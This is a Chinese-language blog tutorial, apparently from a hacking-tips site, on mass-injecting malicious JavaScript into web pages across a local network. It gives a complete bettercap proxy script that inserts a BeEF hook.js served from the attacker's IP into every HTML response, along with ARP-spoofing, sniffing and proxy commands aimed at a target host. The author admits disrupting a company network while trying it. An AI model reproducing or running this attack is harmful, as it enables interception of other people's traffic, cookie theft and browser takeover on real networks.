技术教程 ·

一步步教你如何在局域网内批量植入js恶意代码

前言

注:整个教程都是处于虚拟机情况下演示(只是技术分享,造成的后果与本站无关~)

日常前言,但是也不知道写些什么,都是一些大佬们玩烂了的东西。

通俗解释一下:就是在局域网内进行流量劫持,然后被攻击者访问正常的网页时候会被插入一段我们自己添加的恶意js代码(如获取cookie,网页跳转等~~),不过我只会劫持http的网站,https的暂时不会~~~

攻击准备

1.最新版kali系统一台(应该都有吧)

2.利用工具:Bettercap(进行arp欺骗与dns劫持),beef(kali下的xss平台)

3.要处于局域网~~(同一网段能通信就行)

攻击环境(攻击前要明确目标)

kali的ip:1.1.2.3

目标ip(win10系统):1.1.2.132

启动beef平台

1.进入kali系统,先启用beef平台

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第1张

2.第一次启动报错,提示需要修改默认的账号密码

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第2张

vim /etc/beef-xss/config.yaml

找到下面的进行修改账号密码,我这个是已经修改好的~~

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第3张

下图是启动成功后的截图~~

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第4张

编写js恶意代码

js代码可以自定义,为了方便大家,所以我直接提供一个手打出来了~,直接把下面的ip替换成你kali的ip就行啦,保存为js文件哦~~~欢迎大牛解释代码意思

function onLoad(){
log("BeefInject Loaded.");
}
function onResponse(req,res){
if(res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
log("Hello,this is a test, from:TRY www.nctry.com")
if(body.indexOf('</head>')!=-1){
res.Body = body.replace(
'</head>',
'<script type="text/javascript" src="http://1.1.2.3:3000/hook.js"></script></head>'
);
log("job is OK! from:TRY www.nctry.com");
}
}
}

启用bettercap

在这里我就简单的讲下如何使用就行了~(其实它的功能还很多很多,有兴趣的朋友可以去百度百度)

当然也有图像化ettercap的,这里我们解释这个版本的~

1.先进行安装bettercap

apt-get install bettercap

2.安装成功后用bettercap命令启动程序

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第5张

3.检测该网段存活的主机

net.probe on

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第6张

(扫描到我们的目标主机)

4.设置恶意js代码,进行arp欺骗与代理

set http.proxy.script /root/try.js    #设置你的js代码文件位置
set https.proxy.script /root/try.js    #设置你的js代码文件位置
set arp.spoof.targets 1.1.2.132 #对指定ip进行欺骗
net.sniff on #开启网络嗅探
http.proxy on            #打开劫持代理
https.proxy on            #打开劫持代理

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第7张

查看效果

在靶机上打开baidu查看效果,出现js弹窗

一步步教你如何在局域网内批量植入js恶意代码 技术教程 第8张

ps:这是我偷的成功图。。我自己在公司,不敢搞了。。

后记

哇,我之前搞半天没演示成功,还把公司网弄断了,不敢搞了。只有等有空再弄了。。

bettercap被称为瑞士军刀,他有很多很多的功能,如dns劫持,下载文件替换等。是一款中间人神器~~

需要了解更多的,可以查看这个文章:https://www.freebuf.com/company-information/194558.html

最后今天就这样了吧~难搞。

参与评论